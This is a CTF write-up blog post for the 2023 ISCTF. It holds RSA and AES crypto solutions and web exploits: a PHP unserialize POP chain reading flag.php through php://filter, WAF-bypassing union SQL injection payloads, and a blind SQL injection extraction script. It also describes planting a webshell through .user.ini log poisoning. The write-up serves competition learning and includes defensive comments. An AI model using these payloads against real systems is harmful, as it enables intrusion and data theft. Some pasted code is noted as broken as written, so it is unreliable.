2023 ISCTF


MISC

签到

关注公众号回复即可

CRYPTO

七七的欧拉

import gmpy2
import libnum
e=8401285423075497989963572888601376313375827722858883767564499066473101615084214973041844878664837606157257039358849583049856161628241418012475432529735909
n=432152441698378064699483477861248685186370933997059561240955008606721122440714401911079809940166001030564568154898016056321610178644787523197683511553137537267888633958748025121107289418655862789735379309860876686806702957866717141989015059964078159475508039148944746204216752920338923606572727416609174122706846998768108379413992532754581002403893713246351822561157872773794074678489186753249818464289282656977755910760949321233205455936640900768550476816337625028164400406774508789965377802341410597304762004128811840465793468925319204372859023161813271656708462167007425631293930526524448614575860997124907763908520468092310813241521654354147253458041427425097994033045955153683026842850821782106060426080510907153445780835566432990277960305087805569077243084286570124937809677589977825584877317110834133112867324989903713385153555651596169992580913947657682552413511123724970924157990380717925201101079486726971517073989539237592075755972151605068066665871999049786364698933896026184476212714243948627529467085811407968757224331218422212671096774497177558572304552446770838705103476020876895688993905049813918935284208727812517395718280411605240277841621666952230969226603609437130816666373828420961521201656417107587442147207042241631890192652571948599179211141433339800443314375190819935886151472531333433370353923941480677374394198616498164251767311741266643046331850957175776651083560075806097684837435335223904490803450147729569668429481609180194416387750955890904075390758467239082389399167224672602621697301333031397100751406483180156470336459169661090008922830293659584802461669187843761879886418663480264756823952677115132360965059815670159526587673671267067745201305439333629448345248021327103248820125999078228904713210598984697246209430213256480902580242105753709187093201488460686380726052112308442368949440190001423225738180159078373559557525816027424849449855058367368875422086014241363152127946431898742544730213544409366303459845569490119931249745922825474645123307895490415998
3269585883146959928222698672413648364391121696092287848931565798557217897678221379451042304811449415982434055522599829843482810025780349284547491767219221510351411192251236517341826619338084348136539121415210345488359563985046136632077665460793346345051213014836088333266911684271237227766588616771431226302155269893547077232087387411935345207081799500649921586279416751311277417949192360648342427657867424947189027886922112452681434778850977010752230391327878892161
c=131966657753896133364569828875531643184749878880319121304297095136358703689902166881493134078444077361901963533024874660653223394908026871262645684559085181201853964670552072973473894856834975625564083293632596509660201837241826000977999776465304389204372522448136157825853229462547654200335796989360976298135526785753292794827973794546628573873041494869557900262774173469086218116191973454785755065481337955080637477841260323357049468422305700486660106485100690994025902902308383873049756465769049378004003006159491538588659484580834202363485591393257515048772389798151850438156306447978425353909189392593409500838559252903145314933778382649132430822276219075683983909174253658306879163213588327175051077633089759832333956892623420506894139752439044625405740477904185057284821243758962979498079989497493773006539430728409662281443857527857174351648506205888279453140745459734160416658604040686786832300225803573732845092357687893567599837713486035784254759551624373744980984570831900374414475313097764920172537089891893902209778384447719672348287909482924920394978470340836939621923355201910899090002912306336967012929196029357611530137107120919845529900732735260224939950033442493448852850677347242041411961782857842463318232074957669719693676228330622897412624243466370360949500365624419406749376981503213457713880779939527984370863077441234195269114690626469488924537554563568853466237120221366001297743159874648260166812267927941903928825706984329777084026300287020684985799514839643971714355361114022860753164724535225425182408679770456175636344868198365445439356993217397094315722552778006712689583237064545637212750705775023225782857962885650483297577585505981628368412344498439317112520644058862792573622322271878431920956180402383523852679296622958225157547551434956682484691141165974032115427253458969449741106597171415740931800717940383302533734992493848721192058378045689787980109947686564541618202593039026706417027161376057794965554894931729579236177203218546367841098356847064783775
8657058230086368185901572658482084202212103405161775243930901117532775865963215971025744893777631306256061896284125630451368067313753222195227231131526000755922331413457862253392530308284156400411897252674398583100198330007779643967156773216464341590817951828849769679134515304258819218015083183653130972243262400248230445031327719507314015062447355358100770763425336581258193908638241498461735819218673116282476452340137513156421147748432605954889277898079292196216
# RSA decryption once Euler's totient of the modulus is known: the private
# exponent is the inverse of e modulo phi(n), so a modulus whose totient can
# be computed directly gives the ciphertext no protection.
# NOTE(review): euler_phi is not provided by the gmpy2/libnum imports shown
# here; presumably it comes from Sage or sympy -- confirm before running.
# NOTE(review): as pasted, the digits of n and c appear to continue on a second
# line; Python reads that line as a separate expression statement, so the
# literals need to be rejoined first.
d = gmpy2.invert(e, euler_phi(n))
m = pow(c, d, n)
flag_bytes = libnum.n2s(int(m))
print(flag_bytes)
# ISCTF{3237saq-21se82-3s74f8-8h84ps7-9qw45v7-6bs531-s26h23-c7iu01}

signin

c = 29897791365314067508830838449733707533227957127276785142837008063510003132596050393885548439564070678838696563164574990811756434599732001622138564176327233154381380717648392357672642893142367607369679906940371540867456654151408884171467638060523066406441697453971996011548195499549200103123841556085936672833238264876038160712793697159776332101536779874757463509294968879216810485825310481778472384531442206034564488532399171243463881900578407746982324779260941957792455217641883334131366614310644607114128868153897806362954456585661855569432513785225453501792356175649676419772626548071916379318631677869452985829916084336045071072493567871623113923140668031380684940109024609167449291380675124701557542736834722898328082888430566229322840781411336263268594978558564310744076581639469210462567543585251718744340216155557606004995449505782302864725856877289388008819135023371948017425832082773421030256964953984562211638060
n = 3231913372897424708803097969843687520868057190788284975066875241636436021279559026753076528399891936983240045179193386905918743759145596242896507856007669217275515235051689758768735530529408948098860529277921046146065473333357110158008648799207873976745048714516868561754202543130629713461365314627535982379718931633528922076268531363809414255082933615667770491818402126891370106045838695484124212397783571579791558324350069782623908757815983802849109451590357380624488436968737140312471089662428308113246310588336044438265822574558816510054763215983649467009345458480077882624118620789015758507736272402998721366662352794082495441303895025585316667229865533166614969641012195668280586477033200418153345241668242651407009849656745509386158276185301334443855737552801531617549980843398648751032649895403939319648954908487619711555700124294191702406981128355348449748466449951568451135718146828444185238617155432417897711198169
d = 220908195398117048628110042133057032501548264225985823161565460390793825899523662424732910718579350524590368287207857059670558852106434615134645183432670023784725430385048028248108677670095524205518013647694485975996499747580966911259433184798952372110628624294686853944766950244209186984164963987120416687012811346656498861438432610431705868541829977481875385468143747334359481673214618931159403123892213161430602430294790913847722073762999311674428134241956293914716183107414340330449465142849402354034926378025006749405210014879947411570380433942279355488861684317611066949685697268714760755591128598654573304969

from Crypto.Util.number import *



# Derive a working modulus from (n, d) alone, then decrypt with it.
# 2**(n*d) - 2 is reduced mod n and its gcd with n is used as the modulus `pq`.
# NOTE(review): this presumably relies on the public exponent being n itself and
# on d being its inverse modulo phi(pq), so that 2**(n*d) == 2 (mod pq) --
# confirm against the challenge source, which is not shown here.
# The gcd step shows that handing out d together with n exposes a factor of n.
residue = pow(2, n * d, n) - 2
pq = GCD(n, residue)
m = pow(c, d, pq)
print(long_to_bytes(m))
# b'ISCTF{aeb8be10-ff19-42cf-8cfd-2ce71ac418e8}'

EasyAES

先通过异或求key

def padding(m):
    """Return the pad bytes for length *m* followed by the known flag prefix.

    The pad is ``16 - m % 16`` bytes, each holding that count as its value,
    and the prefix is ``ISCTF{1``.  For ``m = 39`` this gives nine ``0x09``
    bytes plus the seven prefix bytes, i.e. exactly one 16-byte AES block.
    """
    pad_len = 16 - m % 16
    return bytes([pad_len]) * pad_len + b'ISCTF{1'
from Crypto.Util.number import bytes_to_long, long_to_bytes

# First plaintext block as reconstructed by padding(): pad bytes + known prefix.
a = padding(39)
print(a)

# XORing the hint with that block yields the key, i.e. the hint behaves as
# key XOR first plaintext block. Publishing a key XORed with predictable
# plaintext is equivalent to publishing the key.
hint = 0x47405a4847405a48470000021a0f2870
key_as_int = hint ^ bytes_to_long(a)
key = long_to_bytes(key_as_int)
print(key)
#key=b'NISANISANISANISA'

求得key之后求IV

from Crypto.Cipher import AES


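def calculate_iv(key, ciphertext, known_plaintext):
    """Recover the CBC IV from the key and a known first plaintext block.

    In CBC mode the first plaintext block is ``D_k(C_0) XOR IV``, hence
    ``IV = D_k(C_0) XOR P_0``.  The raw block decryption ``D_k`` is taken with
    ECB mode.  Building the cipher as ``AES.new(key, AES.MODE_CBC)`` without an
    IV makes PyCryptodome choose a random one, which is XORed into the output
    and produces a different, wrong value on every run.

    Args:
        key: AES key bytes.
        ciphertext: Ciphertext bytes; only the first 16 bytes are used.
        known_plaintext: The first plaintext block (16 bytes).

    Returns:
        The IV as bytes.  If ``known_plaintext`` is shorter than 16 bytes the
        result is truncated to that length.
    """
    # ECB applies the bare block cipher, so no chaining value is mixed in.
    raw_block = AES.new(key, AES.MODE_ECB).decrypt(ciphertext[:16])

    return bytes(x ^ y for x, y in zip(raw_block, known_plaintext))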


# Known inputs: the recovered key, the first 16 ciphertext bytes, and the
# first plaintext block (nine 0x09 bytes followed by the known flag prefix).
key = b'NISANISANISANISA'
ciphertext = b'bsF\xb6m\xcf\x94\x9fg1\xfaxG\xd4\xa3\x04\xfb\x9c\xac\xed\xbe\xc4\xc0\xb5\x899|u\xbf9e\xe0\xa6\xdb5\xa8x\x84\x95(\xc6\x18\xfe\x07\x88\x02\xe1v'[:16]
known_plaintext = b'\t' * 9 + b'ISCTF{1'

# Compute the IV and show it.
iv = calculate_iv(key, ciphertext, known_plaintext)
print(iv)

求得的 IV 每次可能不同;不过 CBC 模式下 IV 只参与第一个分组的解密,因此用它解密时只有明文最前面的几位会变化,flag 后面的内容不受影响。

from Crypto.Cipher import AES
from Crypto.Util.number import bytes_to_long, long_to_bytes

hint = 0x47405a4847405a48470000021a0f2870
key = b'NISANISANISANISA'

# hint XOR key gives back the first plaintext block used to derive the key.
mes = long_to_bytes(hint ^ bytes_to_long(key))
print(mes)

# Full ciphertext (three 16-byte blocks) and one IV value obtained earlier.
ciphertext = b'bsF\xb6m\xcf\x94\x9fg1\xfaxG\xd4\xa3\x04\xfb\x9c\xac\xed\xbe\xc4\xc0\xb5\x899|u\xbf9e\xe0\xa6\xdb5\xa8x\x84\x95(\xc6\x18\xfe\x07\x88\x02\xe1v'
iv = b'\x190\xb6]L\xdc\xd4\x05\x0fo\xca\x9e\xc3\x05Sj'

def decrypt_aes_cbc(ciphertext, key, iv):
    """Decrypt *ciphertext* with AES-CBC under *key* and *iv*.

    The raw decryption is returned as-is; no padding is stripped.  In CBC the
    IV is XORed into the first block only, so a wrong IV garbles just the
    first 16 bytes of the result.
    """
    return AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext)

# 已知的数据


# Decrypt the whole ciphertext.
plaintext = decrypt_aes_cbc(ciphertext, key, iv)

# Print the plaintext without its first 9 bytes (the length of the pad that
# precedes the flag prefix in the reconstructed first block).
recovered = plaintext[9:]
print(recovered)
# b'\t\t\t\t\t\t\t\t\tISCTF{1'
# b'\xbeX\x95z\xfe/\rb106cea3fb848e7bea310c9851f15c1}'

flag 共 39 位:解密结果中不变的部分 b106cea3fb848e7bea310c9851f15c1} 是 32 位,加上已知前缀 ISCTF{1(7 位)正好是 39 位。

ISCTF{1b106cea3fb848e7bea310c9851f15c1}

WEB

圣杯战争!!!

<?php
// Prints this script's own source to the visitor, so the class definitions below are public.
highlight_file(__FILE__);
// Sets the error reporting level to 0, i.e. no PHP errors are reported from here on.
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;

    /**
     * String-conversion hook: runs whenever an artifact is echoed or concatenated.
     *
     * It reads `arrow` from whatever object sits in $excalibuer, not from this
     * object, so an object that lacks that property gets its __get() called.
     * Code reachable from unserialize() should not dereference properties that
     * the serialized data fully controls.
     */
    public function __toString(){
        echo "为Saber选择了对的武器!<br>";
        $holder = $this->excalibuer;
        return $holder->arrow;
    }
}

class prepare{
    public $release;

    /**
     * Fallback for reads of undefined or inaccessible properties.
     *
     * Whatever is stored in $release is called as a function and its result is
     * returned; $key is ignored. If $release can be set from serialized input,
     * whoever supplies that input decides what gets invoked here.
     */
    public function __get($key){
        echo "蓄力!咖喱棒!!<br>";
        $callback = $this->release;
        return $callback();
    }
}
class saber{
    public $weapon;

    /**
     * Makes the object callable; calling it includes the path held in $weapon.
     *
     * include accepts stream wrappers such as php://filter as well as plain
     * paths, so $weapon must never come from untrusted data. If dynamic
     * inclusion is needed at all, restrict it to a fixed allow-list of files.
     */
    public function __invoke(){
        echo "胜利!<br>";
        include $this->weapon;
    }
}
class summon{
    public $Saber;
    public $Rider;

    /**
     * Runs automatically when unserialize() rebuilds a summon object.
     *
     * Echoing $Saber converts it to a string, which calls __toString() on
     * whatever object the serialized data placed there. Avoid unserialize() on
     * request data; where it cannot be avoided, pass
     * ['allowed_classes' => false] (or an explicit class list) as its second
     * argument so no project class is instantiated.
     */
    public function __wakeup(){
        echo "开始召唤从者!<br>", $this->Saber;
    }
}

// Builds the object graph summon -> artifact -> prepare -> saber and prints
// its serialized form. When such a string is unserialized, the magic methods
// fire in the order __wakeup -> __toString -> __get -> __invoke, ending in
// include() on the filter URL, which emits flag.php base64-encoded.
// Defensive view: serialized input that names application classes together
// with a php:// wrapper is a strong signal worth alerting on in request logs.
$inner = new saber();
$inner->weapon = 'php://filter/convert.base64-encode/resource=flag.php';

$getter = new prepare();
$getter->release = $inner;

$text = new artifact();
$text->excalibuer = $getter;

$a = new summon();
$a->Saber = $text;
echo serialize($a);
?>
O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}s:5:"arrow";N;}s:5:"Rider";N;}

where_is_the_flag

蚁剑直接连接

image-20231130113044732

image-20231130113032259

image-20231130113125807

绕进你的心里

http://43.249.195.138:21043/?hongmeng[]=1&shennong[]=2&zhurong[]=a
import requests

# The query parameters are sent as arrays (name[]=...) and the POST field is
# 'very' repeated 250000 times (1,000,000 characters) followed by 2023ISCTF.
# NOTE(review): the challenge source is not shown; presumably its checks
# mishandle array inputs and very long strings. Defensively: verify parameter
# types, cap input length before pattern matching, and treat a preg_match()
# result of false as a failed check rather than "no match".
target = 'http://43.249.195.138:21043/?hongmeng[]=1&shennong[]=2&zhurong[]=1'
form = {'pan_gu': 'very' * 250000 + '2023ISCTF'}
body = requests.post(url=target, data=form).text
print(body)

easy_website

本来想用sqlmap但是好像有waf

通过测试 过滤了 or、空格 、union、select

双写绕过 or

username=1'/**/oorrder/**/by/**/1#&password=1

image-20231126150435180

则只有一列

读取数据库

username=1'/**/ununionion/**/selselectect/**/database()#&password=1

image-20231126150736138

读取表名

username=1'/**/ununionion/**/selselectect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()#&password=1

image-20231126153449939

读取列名

username=1'/**/ununionion/**/selselectect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users'#&password=1

image-20231126153647336

读取flag

username=1'/**/ununionion/**/selselectect/**/group_concat(user,passwoorrd)/**/from/**/users#&password=1

image-20231126153749895

wafr

说明 system可以用

image-20231126162046666

直接* 、\绕过

image-20231126162149173

ez_ini

对文件后缀和文件内容进行过滤了

发现过滤了< ,基本上不能用 post传码了

这里用日志注入

上传.user.ini

image-20231126165859320

access.log里面存放的是UA头

我们上传.user.ini之后可以查看

image-20231126170008680

然后通过把码写进UA头

image-20231126170035463

蚁剑连接

image-20231126170056714

image-20231126170122054

webinclude

目录扫描得到index.bak

image-20231127133020525

index.bak

 /**
  * Encode a string as base-26 digit pairs.
  *
  * Every UTF-16 code unit contributes two numbers: its quotient by 26
  * followed by its remainder modulo 26.
  */
 function string_to_int_array(str){
        const digits = [];

        for (let pos = 0; pos < str.length; pos += 1) {
          const code = str.charCodeAt(pos);
          digits.push(Math.floor(code / 26), code % 26);
        }

        return digits;
      }

      /**
       * Map each number to the character with code 97 + number
       * (0 -> 'a', 1 -> 'b', ...) and concatenate the results.
       */
      function int_array_to_text(int_array){
        const letters = [];

        for (let k = 0; k < int_array.length; k += 1) {
          letters.push(String.fromCharCode(97 + int_array[k]));
        }

        return letters.join('');
      }


// The input is encoded twice and compared with a fixed string. The check runs
// entirely in the browser and the encoding is reversible, so it hides neither
// the expected value nor flag.html; access control has to be enforced by the
// server.
const firstPass = int_array_to_text(string_to_int_array(parameter));
const hash = int_array_to_text(string_to_int_array(firstPass));
if (hash !== 'dxdydxdudxdtdxeadxekdxea') {
  document.getElementById('fail').style.display = '';
} else {
  window.location = 'flag.html';
}

chatgpt一键生成脚本

// The string that the page's client-side check compares the encoded input against.
const targetHash = 'dxdydxdudxdtdxeadxekdxea';

/**
 * Inverse of int_array_to_text: turn each character into its code minus 97
 * ('a' -> 0, 'b' -> 1, ...).
 */
function text_to_int_array(txt){
  return Array.from(txt, (ch) => ch.charCodeAt(0) - 97);
}

/**
 * Inverse of string_to_int_array: combine each pair (high, low) into the
 * character with code high * 26 + low. A missing low digit counts as 0.
 */
function int_array_to_string(int_array){
  const chars = [];

  for (let k = 0; k < int_array.length; k += 2) {
    const low = int_array[k + 1] || 0;
    chars.push(String.fromCharCode(int_array[k] * 26 + low));
  }

  return chars.join('');
}

// Undo the page's two encoding rounds: letters -> digits -> characters, twice.
const undoRound = (encoded) => int_array_to_string(text_to_int_array(encoded));
const reversedParameter = undoRound(targetHash);
const reversedParameter1 = undoRound(reversedParameter);

console.log(reversedParameter1);

#mihoyo

根据提示include直接尝试get传参,读取flag.php

mihoyo=php://filter/convert.base64-encode/resource=flag.php

1zsql

import requests

# Boolean-based extraction through the login form: a response containing
# 'illegal words!' is treated as a match for the guessed character code.
# Defensive view: bind username/password as query parameters instead of
# concatenating them into SQL; a burst of login POSTs whose username contains
# substr()/ord()/regexp is a reliable detection signal.
url = 'http://43.249.195.138:22668/'
version = "version()"
database_len = "admin' and length(database()) regexp {i}#"  # 6
db = "select database()"  # bthcls
table = "select table_name from mysql.innodb_index_stats where database_name=database()"
# NOTE(review): the next string is not used below and looks truncated as pasted.
col_name = "select group_concat(column_name) from informatoin_schema.columns where tablen"
column = "select group_concat(username,password) from bthcls.users"

result = ''
for i in range(1, 20):
    # Codes 33..125 are tried for each position; running out of candidates
    # without a match ends the script.
    for j in range(33, 126):
        payload = f"admin' and ord(substr(({table}),{i},1)) regexp {j}#"
        resp = requests.post(url=url, data={'username': payload, 'password': '123'})
        if 'illegal words!' in resp.text:
            result += chr(j)
            print(result)
            break
    else:
        exit(0)

文章作者: f14g
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 f14g !